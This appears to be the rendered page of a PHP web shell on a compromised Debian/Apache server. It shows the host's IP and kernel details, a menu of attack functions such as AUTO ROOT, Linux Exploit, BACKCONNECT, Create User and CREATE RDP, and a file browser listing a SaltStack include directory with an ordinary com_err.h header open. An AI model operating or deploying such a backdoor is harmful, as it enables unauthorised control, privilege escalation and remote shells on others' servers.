Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
saltstack /
salt /
include /
[ HOME SHELL ]
Name
Size
Permission
Action
gssapi
[ DIR ]
drwxr-xr-x
gssrpc
[ DIR ]
drwxr-xr-x
kadm5
[ DIR ]
drwxr-xr-x
krb5
[ DIR ]
drwxr-xr-x
lzma
[ DIR ]
drwxr-xr-x
ncursesw
[ DIR ]
drwxr-xr-x
openssl
[ DIR ]
drwxr-xr-x
python3.10
[ DIR ]
drwxr-xr-x
readline
[ DIR ]
drwxr-xr-x
tirpc
[ DIR ]
drwxr-xr-x
uuid
[ DIR ]
drwxr-xr-x
bzlib.h
6.09
KB
-rw-r--r--
com_err.h
1.93
KB
-rw-r--r--
crypt.h
10.87
KB
-rw-r--r--
dbm.h
1.37
KB
-rw-r--r--
ffi.h
13.71
KB
-rw-r--r--
ffitarget.h
4.81
KB
-rw-r--r--
gdbm.h
11.9
KB
-rw-r--r--
gssapi.h
181
B
-rw-r--r--
kdb.h
62.75
KB
-rw-r--r--
krad.h
8.72
KB
-rw-r--r--
krb5.h
402
B
-rw-r--r--
lzma.h
9.72
KB
-rw-r--r--
ndbm.h
2.39
KB
-rw-r--r--
profile.h
11.89
KB
-rw-r--r--
sqlite3.h
625.79
KB
-rw-r--r--
sqlite3ext.h
37.25
KB
-rw-r--r--
verto-module.h
6.48
KB
-rw-r--r--
verto.h
18.98
KB
-rw-r--r--
xcrypt.h
2.46
KB
-rw-r--r--
zconf.h
16.08
KB
-rw-r--r--
zlib.h
94.56
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : com_err.h
/* * Copyright 1988, Student Information Processing Board of the * Massachusetts Institute of Technology. * * Copyright 1995 by Cygnus Support. * * For copyright and distribution info, see the documentation supplied * with this package. */ /* Header file for common error description library. */ #ifndef __COM_ERR_H #if defined(_WIN32) #include <win-mac.h> #endif #ifndef KRB5_CALLCONV #define KRB5_CALLCONV #define KRB5_CALLCONV_C #endif #include <stdarg.h> typedef long errcode_t; typedef void (*et_old_error_hook_func) (const char *, errcode_t, const char *, va_list ap); struct error_table { /*@shared@*/ char const * const * msgs; long base; unsigned int n_msgs; }; #ifdef __cplusplus extern "C" { #endif /* Public interfaces */ extern void KRB5_CALLCONV_C com_err (const char *, errcode_t, const char *, ...) #if !defined(__cplusplus) && (__GNUC__ > 2) __attribute__((__format__(__printf__, 3, 4))) #endif ; extern void KRB5_CALLCONV com_err_va (const char *whoami, errcode_t code, const char *fmt, va_list ap) #if !defined(__cplusplus) && (__GNUC__ > 2) __attribute__((__format__(__printf__, 3, 0))) #endif ; extern /*@observer@*//*@dependent@*/ const char * KRB5_CALLCONV error_message (errcode_t) /*@modifies internalState@*/; extern errcode_t KRB5_CALLCONV add_error_table (/*@dependent@*/ const struct error_table *) /*@modifies internalState@*/; extern errcode_t KRB5_CALLCONV remove_error_table (const struct error_table *) /*@modifies internalState@*/; #if !defined(_WIN32) /* * The display routine should be application specific. A global hook, * may cause inappropriate display procedures to be called between * applications under non-Unix environments. */ extern et_old_error_hook_func set_com_err_hook (et_old_error_hook_func); extern et_old_error_hook_func reset_com_err_hook (void); #endif #ifdef __cplusplus } #endif #define __COM_ERR_H #endif /* ! defined(__COM_ERR_H) */
Close